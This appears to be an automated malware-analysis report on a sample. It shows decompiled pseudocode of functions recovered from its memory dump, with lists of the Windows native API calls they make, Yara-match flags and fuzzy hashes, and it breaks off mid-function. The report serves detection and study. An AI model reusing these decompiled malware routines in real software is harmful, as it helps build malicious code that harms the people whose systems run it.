                                                                                                                          				void* _t28;
                                                                                                                          				void* _t29;
                                                                                                                          				intOrPtr* _t30;
                                                                                                                          				void* _t32;
                                                                                                                          
                                                                                                                          				asm("cvtps2pd xmm2, [ecx+0x55]");
                                                                                                                          				_t13 = _a4;
                                                                                                                          				_t30 = _a4 + 0xc48;
                                                                                                                          				E0041AB20(_t28, _t13, _t30,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                          				_t6 =  &_a32; // 0x414d32
                                                                                                                          				_t12 =  &_a8; // 0x414d32
                                                                                                                          				_t18 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t29, _t32); // executed
                                                                                                                          				return _t18;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 2MA$2MA
                                                                                                                          • API String ID: 2738559852-947276439
                                                                                                                          • Opcode ID: 73bcaf09a2a61078f1d781c27756ca93da96efef112bc5d4b270d463a52e6b7a
                                                                                                                          • Instruction ID: 104f8a14ad246c84b076e6c0995b0dbe01c20c6baf94378359c58f09699a7de8
                                                                                                                          • Opcode Fuzzy Hash: 73bcaf09a2a61078f1d781c27756ca93da96efef112bc5d4b270d463a52e6b7a
                                                                                                                          • Instruction Fuzzy Hash: 98F0EC71204104ABDB04DF99DC51EDB77A9EF8C754F118249BE1D97241D631E811CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00419FD0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                          				void* _t18;
                                                                                                                          				void* _t27;
                                                                                                                          				intOrPtr* _t28;
                                                                                                                          
                                                                                                                          				_t13 = _a4;
                                                                                                                          				_t28 = _a4 + 0xc48;
                                                                                                                          				E0041AB20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                          				_t6 =  &_a32; // 0x414d32
                                                                                                                          				_t12 =  &_a8; // 0x414d32
                                                                                                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                          				return _t18;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 2MA$2MA
                                                                                                                          • API String ID: 2738559852-947276439
                                                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
                                                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00419F74(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                          				long _t23;
                                                                                                                          				void* _t33;
                                                                                                                          
                                                                                                                          				asm("cld");
                                                                                                                          				asm("sbb eax, 0x8b55eba0");
                                                                                                                          				_t17 = _a4;
                                                                                                                          				_t3 = _t17 + 0xc40; // 0xc40
                                                                                                                          				E0041AB20(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                          				_t11 =  &_a20; // 0x414b77
                                                                                                                          				_t23 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                          				return _t23;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 1f282038835892fe2a911355963dae7f061a2992e7c6dfaffda584ea3c3d0ae9
                                                                                                                          • Instruction ID: 958d07229d913f87e4baa3ae89b3a7fbe58ef3a034b199866343c7c2239820d4
                                                                                                                          • Opcode Fuzzy Hash: 1f282038835892fe2a911355963dae7f061a2992e7c6dfaffda584ea3c3d0ae9
                                                                                                                          • Instruction Fuzzy Hash: 0901F2B2204108AFCB08CF88DC95EEB37EAAF8C354F118209FA1DD3240C630E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00419F1A(void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, char _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				long _t21;
                                                                                                                          				void* _t33;
                                                                                                                          
                                                                                                                          				_push(es);
                                                                                                                          				asm("sbb eax, 0x8b55eba0");
                                                                                                                          				_t15 = _v0;
                                                                                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                          				E0041AB20(_t33, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                                                                                                                          				_t11 =  &_a16; // 0x414b77
                                                                                                                          				_t21 = NtCreateFile(_a4, _a8, _a12,  *_t11, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                                                                                                          				return _t21;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 00413d03e9703152796fabcd5b5efe14935391633a0e48a8fd2306b87820dcc4
                                                                                                                          • Instruction ID: 59240f0c24d42f4f4d5e5ce5e836e36d48a0276155dc8ed090b9bdda842d8758
                                                                                                                          • Opcode Fuzzy Hash: 00413d03e9703152796fabcd5b5efe14935391633a0e48a8fd2306b87820dcc4
                                                                                                                          • Instruction Fuzzy Hash: 1801BDB2205108AFDB08CF98DC95EEB37AAAF8C754F158649FA1DD7241C630EC51CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00419F20(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                          				long _t21;
                                                                                                                          				void* _t31;
                                                                                                                          
                                                                                                                          				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                          				E0041AB20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                          				_t11 =  &_a20; // 0x414b77
                                                                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                          				return _t21;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E0040ACC0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                          				char* _v8;
                                                                                                                          				struct _EXCEPTION_RECORD _v12;
                                                                                                                          				struct _OBJDIR_INFORMATION _v16;
                                                                                                                          				char _v536;
                                                                                                                          				void* _t17;
                                                                                                                          				intOrPtr _t19;
                                                                                                                          				struct _OBJDIR_INFORMATION _t20;
                                                                                                                          				signed int _t25;
                                                                                                                          				signed int* _t29;
                                                                                                                          
                                                                                                                          				_v8 =  &_v536;
                                                                                                                          				_t17 = E0041C810( &_v12, 0x104, _a8);
                                                                                                                          				if(_t17 != 0) {
                                                                                                                          					_t19 = E0041CC30(__eflags, _v8);
                                                                                                                          					__eflags = _t19;
                                                                                                                          					if(_t19 != 0) {
                                                                                                                          						_t29 =  &_v12;
                                                                                                                          						_t25 = E0041CEB0(_t29, 0);
                                                                                                                          						asm("cmpsb");
                                                                                                                          						 *_t29 =  *_t29 & _t25;
                                                                                                                          						_t7 = __ebx + 0x558b08c4;
                                                                                                                          						 *_t7 =  *((intOrPtr*)(__ebx + 0x558b08c4)) + _t25;
                                                                                                                          						__eflags =  *_t7;
                                                                                                                          						asm("les ecx, [eax]");
                                                                                                                          					}
                                                                                                                          					_t20 = E0041B060(_v8);
                                                                                                                          					_v16 = _t20;
                                                                                                                          					__eflags = _t20;
                                                                                                                          					if(_t20 == 0) {
                                                                                                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                          						return _v16;
                                                                                                                          					}
                                                                                                                          					return _t20;
                                                                                                                          				} else {
                                                                                                                          					return _t17;
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E0041A04A(signed char* __ecx) {
                                                                                                                          
                                                                                                                          				asm("movsb");
                                                                                                                          				if (( *__ecx & 0x000000a8) <= 0) goto L3;
                                                                                                                          			}




                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A100(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                          				long _t14;
                                                                                                                          				void* _t21;
                                                                                                                          
                                                                                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                          				E0041AB20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                          				return _t14;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E004082E8(void* __ecx, void* __esi, long _a8) {
                                                                                                                          				char _v63;
                                                                                                                          				char _v64;
                                                                                                                          				long __edi;
                                                                                                                          				void* __ebp;
                                                                                                                          				void* _t16;
                                                                                                                          
                                                                                                                          				_pop(ss);
                                                                                                                          				asm("bound eax, [ebx]");
                                                                                                                          				if(__esi + 1 >= 0) {
                                                                                                                          					_t16 = E0041B330(__ecx);
                                                                                                                          					if(_t16 == 0 || _t16 == 0x33333333) {
                                                                                                                          						__eflags = 0;
                                                                                                                          						return 0;
                                                                                                                          					} else {
                                                                                                                          						return  *_a8 + _t16;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					__eflags = __ecx;
                                                                                                                          					_push(__ebp);
                                                                                                                          					__ebp = __esp;
                                                                                                                          					__esp = __esp - 0x40;
                                                                                                                          					_push(__esi);
                                                                                                                          					__eax =  &_v63;
                                                                                                                          					_v64 = 0;
                                                                                                                          					__eax = E0041BA20( &_v63, 0, 0x3f);
                                                                                                                          					__ecx =  &_v64;
                                                                                                                          					__eax = E0041C5C0( &_v64, 3);
                                                                                                                          					_a8 = _a8 + 0x1c;
                                                                                                                          					__eax = E0040ACC0(__ebx, __eflags, _a8 + 0x1c,  &_v64); // executed
                                                                                                                          					__eax = E00414E10(_a8 + 0x1c, __eax, 0, 0, 0xc4e7b6d6);
                                                                                                                          					__esi = __eax;
                                                                                                                          					__eflags = __esi;
                                                                                                                          					if(__esi != 0) {
                                                                                                                          						_push(__edi);
                                                                                                                          						__edi = _a8;
                                                                                                                          						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
                                                                                                                          						__eflags = __eax;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							__eax = E0040A450(__eflags, 1, 8);
                                                                                                                          							__eax = __al & 0x000000ff;
                                                                                                                          							__ecx = __ebp + __eax - 0x40;
                                                                                                                          							__eax =  *__esi(__edi, 0x8003, __ebp + __eax - 0x40, __eax);
                                                                                                                          						}
                                                                                                                          						_pop(__edi);
                                                                                                                          					}
                                                                                                                          					_pop(__esi);
                                                                                                                          					__esp = __ebp;
                                                                                                                          					_pop(__ebp);
                                                                                                                          					return __eax;
                                                                                                                          				}
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID: 3333
                                                                                                                          • API String ID: 1836367815-2924271548
                                                                                                                          • Opcode ID: 1c1fdf9ce575306d9f46668dd5bea2b6c3600d1bccfd3aee02544c7a1e1693d2
                                                                                                                          • Instruction ID: e3d37af9f4a3ae998a1a31596c42953fdc38290ff275a8c2d8b9ad50d5f4676e
                                                                                                                          • Opcode Fuzzy Hash: 1c1fdf9ce575306d9f46668dd5bea2b6c3600d1bccfd3aee02544c7a1e1693d2
                                                                                                                          • Instruction Fuzzy Hash: 0C112B316402187FEB20A6949D42FFE77589F41B50F08406EFE44BB2C1DA78A90147EA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oLA
                                                                                                                          • API String ID: 1279760036-3789366272
                                                                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction ID: 91a8afe93875cd4dd2c16ce4d21e80b139c6b658c845053945d21e38953d9919
                                                                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99DC41EA777ADAF88664F11855ABA085B242C630F910CBB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oLA
                                                                                                                          • API String ID: 1279760036-3789366272
                                                                                                                          • Opcode ID: 3d6703e194277b1ae2e8de4049c75e70dfff0c7056d4e725db8d9ccf5dfbc693
                                                                                                                          • Instruction ID: af225ebbf115edaa80c7d7cc310b5c55c013cba1dca817a18a305c20c7dcea64
                                                                                                                          • Opcode Fuzzy Hash: 3d6703e194277b1ae2e8de4049c75e70dfff0c7056d4e725db8d9ccf5dfbc693
                                                                                                                          • Instruction Fuzzy Hash: 4DD0C9B4204108AB8700EF59E8808AB736AAF88218711854AFC1943301C535E8618AB6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                          				char _v67;
                                                                                                                          				char _v68;
                                                                                                                          				void* _t12;
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				int _t14;
                                                                                                                          				long _t22;
                                                                                                                          				intOrPtr* _t26;
                                                                                                                          				void* _t27;
                                                                                                                          				void* _t31;
                                                                                                                          
                                                                                                                          				_t31 = __eflags;
                                                                                                                          				_v68 = 0;
                                                                                                                          				E0041BA20( &_v67, 0, 0x3f);
                                                                                                                          				E0041C5C0( &_v68, 3);
                                                                                                                          				_t12 = E0040ACC0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
                                                                                                                          				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                          				_t26 = _t13;
                                                                                                                          				if(_t26 != 0) {
                                                                                                                          					_t22 = _a8;
                                                                                                                          					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                                                                                                          					_t33 = _t14;
                                                                                                                          					if(_t14 == 0) {
                                                                                                                          						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A450(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                          					}
                                                                                                                          					return _t14;
                                                                                                                          				}
                                                                                                                          				return _t13;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                                                                                          • Instruction ID: dfcb319d37f54b0a0ecf43278dd58f432490a67f975cf55f4cf339e9819450c2
                                                                                                                          • Opcode Fuzzy Hash: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                                                                                          • Instruction Fuzzy Hash: 1A01A731A803287BE720A6A59C43FFF776C6B40F54F05411EFF04BA1C1E6A9691546FA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E0040ACB3(void* __eax, void* __ebx, void* __esi, char _a1, void* _a8, intOrPtr _a12) {
                                                                                                                          				char* _v4;
                                                                                                                          				struct _EXCEPTION_RECORD _v8;
                                                                                                                          				struct _OBJDIR_INFORMATION _v12;
                                                                                                                          				char _v532;
                                                                                                                          				signed int _t17;
                                                                                                                          				struct _OBJDIR_INFORMATION _t18;
                                                                                                                          				void* _t23;
                                                                                                                          				struct _OBJDIR_INFORMATION _t25;
                                                                                                                          				void* _t26;
                                                                                                                          				signed int* _t27;
                                                                                                                          				char* _t35;
                                                                                                                          				char* _t38;
                                                                                                                          				void* _t42;
                                                                                                                          				char* _t44;
                                                                                                                          
                                                                                                                          				_t26 = __ebx;
                                                                                                                          				_t17 = __eax - 0x5b;
                                                                                                                          				asm("in eax, 0x1f");
                                                                                                                          				ds = __esi;
                                                                                                                          				_t35 =  &_a1;
                                                                                                                          				_t44 = _t35;
